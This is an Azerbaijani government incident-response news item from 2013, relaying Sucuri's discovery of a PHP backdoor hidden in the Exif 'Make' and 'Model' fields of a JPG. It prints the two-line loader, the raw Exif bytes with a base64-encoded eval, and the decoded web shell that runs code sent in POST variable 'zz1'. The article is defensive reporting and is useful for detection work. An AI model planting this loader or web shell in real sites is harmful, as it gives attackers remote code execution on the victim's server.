XÜSUSİ DÖVLƏT MÜHAFİZƏ XİDMƏTİ
XÜSUSİ RABİTƏ VƏ İNFORMASİYA
TƏHLÜKƏSİZLİYİ DÖVLƏT AGENTLİYİ

KOMPÜTER İNSİDENTLƏRİNƏ QARŞI MÜBARİZƏ
MƏRKƏZİ

İnsident bildir

Xəbərlər > Bekdorun kodu JPG Exif-də gizlədilib.

20 İyul 2013

 Sucuri şirkəti bekdorun veb sayta daxil edilməsinin yeni üsulunu aşkar ediblər : belə ki JPG uzantısının Exif xidməti sətirində gizlədilib. "Sındırılmış" saytda tərkibində PHP funksiyasını birləşdirən normal görünən PHP kod aşkar olunmuşdur. Birinci funksiya JPG faylından Exif verilənlərinin oxunmasına xidmət edir, ikincisi isə proqramı işə salır.

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

Güman etdiyimiz kimi bun.jpg faylında bekdorun ikinci hissəsi aşkar olundu.

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

Make başlığının tərkibində "/.*/e" vardır.

Əgər base 64 ilə şifrələnmiş mətni deşifrə etsək onda aşağıdakını görərik:

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

Belə ki, bekdor zz1 dəyişənindən aldığı POST sorğu vasitəsilə istənilən kontenti işə sala bilər. Mütəxəsislərin fikrincə icraedici kodun saytda gizlədilməsinin bu üsulu kifayət qədər qeyri adidir.